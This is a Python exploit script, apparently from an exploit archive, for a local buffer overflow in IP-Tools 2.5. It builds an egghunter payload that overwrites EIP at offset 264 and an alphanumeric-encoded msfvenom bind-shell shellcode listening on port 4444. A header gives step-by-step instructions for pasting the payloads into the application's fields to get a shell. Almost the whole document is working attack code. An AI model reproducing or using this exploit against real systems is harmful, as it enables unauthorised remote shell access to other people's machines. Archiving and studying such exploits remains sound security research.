#!/usr/bin/env python #------------------------------------------------------------------------------------------------------------------------------------# # Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) # # Date: 2019-02-06 # # Author: Juan Prescotto # # Tested Against: Win7 Pro SP1 64 bit # # Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe # # Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe # # Version: 2.5 # # Special Thanks to my wife for allowing me spend countless hours on this passion of mine # # Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > # # "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 # #------------------------------------------------------------------------------------------------------------------------------------# # Good Characers: alphanumeric and printable special characters # # EIP Offset Overwrite ("Log to file" field): 264 # # Non-Participating Modules: ip_tools.exe # #------------------------------------------------------------------------------------------------------------------------------------# # "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> # # Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode # #------------------------------------------------------------------------------------------------------------------------------------# ##################EGG Shellcode Generation################################# #msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg #710 bytes + 8 bytes for egg identifier egg = "w00tw00t" egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" egg += "\x69\x6c\x4b\x58\x6d\x52\x35\x50\x35\x50\x75\x50\x63" egg += "\x50\x4f\x79\x4d\x35\x36\x51\x4b\x70\x71\x74\x6e\x6b" egg += "\x36\x30\x46\x50\x6e\x6b\x66\x32\x44\x4c\x6c\x4b\x63" egg += "\x62\x54\x54\x4c\x4b\x72\x52\x65\x78\x34\x4f\x68\x37" egg += "\x52\x6a\x34\x66\x50\x31\x59\x6f\x4c\x6c\x57\x4c\x53" egg += "\x51\x71\x6c\x67\x72\x54\x6c\x31\x30\x5a\x61\x58\x4f" egg += "\x34\x4d\x56\x61\x4f\x37\x68\x62\x4a\x52\x36\x32\x66" egg += "\x37\x4e\x6b\x36\x32\x42\x30\x6c\x4b\x50\x4a\x35\x6c" egg += "\x4c\x4b\x72\x6c\x44\x51\x44\x38\x78\x63\x32\x68\x55" egg += "\x51\x78\x51\x43\x61\x6e\x6b\x76\x39\x45\x70\x75\x51" egg += "\x59\x43\x6e\x6b\x33\x79\x42\x38\x4d\x33\x65\x6a\x71" egg += "\x59\x6e\x6b\x36\x54\x4e\x6b\x36\x61\x78\x56\x46\x51" egg += "\x49\x6f\x4e\x4c\x79\x51\x7a\x6f\x66\x6d\x35\x51\x48" egg += "\x47\x36\x58\x79\x70\x30\x75\x39\x66\x33\x33\x33\x4d" egg += "\x58\x78\x57\x4b\x73\x4d\x56\x44\x53\x45\x48\x64\x61" egg += "\x48\x4e\x6b\x72\x78\x67\x54\x57\x71\x69\x43\x73\x56" egg += "\x6e\x6b\x54\x4c\x50\x4b\x6c\x4b\x53\x68\x37\x6c\x73" egg += "\x31\x58\x53\x4c\x4b\x74\x44\x4e\x6b\x67\x71\x48\x50" egg += "\x4f\x79\x70\x44\x36\x44\x76\x44\x51\x4b\x71\x4b\x55" egg += "\x31\x46\x39\x32\x7a\x63\x61\x4b\x4f\x6b\x50\x53\x6f" egg += "\x61\x4f\x61\x4a\x4c\x4b\x62\x32\x6a\x4b\x6e\x6d\x31" egg += "\x4d\x63\x58\x75\x63\x54\x72\x35\x50\x45\x50\x33\x58" egg += "\x52\x57\x33\x43\x36\x52\x73\x6f\x62\x74\x33\x58\x30" egg += "\x4c\x31\x67\x54\x66\x63\x37\x69\x6f\x6e\x35\x78\x38" egg += "\x4e\x70\x63\x31\x37\x70\x43\x30\x35\x79\x4f\x34\x32" egg += "\x74\x46\x30\x51\x78\x36\x49\x4f\x70\x52\x4b\x63\x30" egg += "\x59\x6f\x38\x55\x73\x5a\x43\x38\x70\x59\x36\x30\x49" egg += "\x72\x59\x6d\x57\x30\x52\x70\x47\x30\x50\x50\x51\x78" egg += "\x5a\x4a\x44\x4f\x6b\x6f\x79\x70\x39\x6f\x39\x45\x4f" egg += "\x67\x65\x38\x44\x42\x77\x70\x64\x51\x71\x4c\x6c\x49" egg += "\x6d\x36\x32\x4a\x72\x30\x63\x66\x56\x37\x30\x68\x68" egg += "\x42\x4b\x6b\x64\x77\x61\x77\x59\x6f\x39\x45\x70\x57" egg += "\x35\x38\x6d\x67\x68\x69\x65\x68\x59\x6f\x6b\x4f\x4a" egg += "\x75\x36\x37\x75\x38\x34\x34\x58\x6c\x57\x4b\x4d\x31" egg += "\x49\x6f\x4a\x75\x51\x47\x4e\x77\x55\x38\x32\x55\x52" egg += "\x4e\x70\x4d\x43\x51\x39\x6f\x6e\x35\x51\x78\x70\x63" egg += "\x32\x4d\x33\x54\x77\x70\x6e\x69\x68\x63\x30\x57\x63" egg += "\x67\x30\x57\x55\x61\x6b\x46\x71\x7a\x56\x72\x31\x49" egg += "\x62\x76\x6d\x32\x79\x6d\x55\x36\x6a\x67\x62\x64\x51" egg += "\x34\x67\x4c\x73\x31\x33\x31\x6e\x6d\x71\x54\x44\x64" egg += "\x66\x70\x39\x56\x43\x30\x77\x34\x43\x64\x76\x30\x72" egg += "\x76\x61\x46\x50\x56\x32\x66\x30\x56\x62\x6e\x72\x76" egg += "\x53\x66\x61\x43\x52\x76\x62\x48\x44\x39\x78\x4c\x45" egg += "\x6f\x4f\x76\x69\x6f\x68\x55\x6b\x39\x39\x70\x42\x6e" egg += "\x66\x36\x50\x46\x69\x6f\x36\x50\x75\x38\x33\x38\x4b" egg += "\x37\x67\x6d\x73\x50\x69\x6f\x6a\x75\x6d\x6b\x58\x70" egg += "\x4d\x65\x79\x32\x76\x36\x75\x38\x4e\x46\x6f\x65\x6d" egg += "\x6d\x6f\x6d\x69\x6f\x79\x45\x35\x6c\x73\x36\x31\x6c" egg += "\x44\x4a\x6b\x30\x79\x6b\x4d\x30\x73\x45\x74\x45\x6f" egg += "\x4b\x30\x47\x32\x33\x31\x62\x72\x4f\x52\x4a\x37\x70" egg += "\x72\x73\x49\x6f\x7a\x75\x41\x41" f = open ("egg.txt", "w") f.write(egg) f.close() ##################EGG Hunter Shellcode Generation################################# #encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode proceeded by xor edx,edx (start egg hunting at 0x00000000) #echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p - #150 bytes egghunter = "" egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" egghunter += "\x42\x75\x4a\x49\x35\x63\x4b\x62\x30\x31\x4b\x6b" egghunter += "\x52\x73\x56\x33\x46\x33\x46\x33\x58\x33\x49\x50" egghunter += "\x45\x36\x6f\x71\x6a\x6a\x6b\x4f\x46\x6f\x31\x52" egghunter += "\x66\x32\x72\x4a\x55\x76\x32\x78\x70\x33\x38\x49" egghunter += "\x6e\x6b\x5a\x74\x55\x34\x79\x6f\x37\x63\x53\x6e" egghunter += "\x62\x7a\x55\x6c\x66\x65\x51\x64\x4d\x39\x48\x38" egghunter += "\x30\x77\x50\x30\x70\x30\x74\x34\x4e\x6b\x58\x7a" egghunter += "\x6c\x6f\x51\x65\x4a\x44\x4e\x4f\x42\x55\x79\x71" egghunter += "\x69\x6f\x6a\x47\x41\x41" #0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE] eip = "\x59\x32\x47\x00" buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip f = open ("egghunter.txt", "w") f.write(buffer) f.close()